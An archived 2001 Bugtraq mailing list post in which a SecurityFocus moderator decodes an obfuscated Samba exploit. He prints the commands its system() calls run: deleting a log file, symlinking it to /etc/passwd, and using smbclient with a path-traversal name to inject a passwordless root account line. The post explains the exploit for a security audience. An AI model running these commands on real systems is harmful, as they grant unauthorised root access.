Bugtraq mailing list archives

Samba Exploit Code


From: Dave Ahmad <da () securityfocus com>
Date: Thu, 25 Oct 2001 21:33:23 -0600 (MDT)


Hey,

There is some confusion about the Samba exploit.  It is an obfuscated
exploit for an old vulnerability in the Samba daemon.  Before approving it
to the list, I checked it.

The system() calls:

system(inject1, 0);
system(inject2, 0);
system(inject3a, 0);

Try this:

printf("%s\n%s\n%s\n",inject1,inject2,inject3a);

output:

/bin/rm -rf /tmp/x.log
/bin/ln -s /etc/passwd /tmp/x.log
/usr/bin/smbclient //localhost/"

fd::0:0::/:/bin/sh\n" -n ../../../tmp/x -N

I am not sure why they chose to write the exploit this way.

Regards,

Dave Ahmad
SecurityFocus
www.securityfocus.com

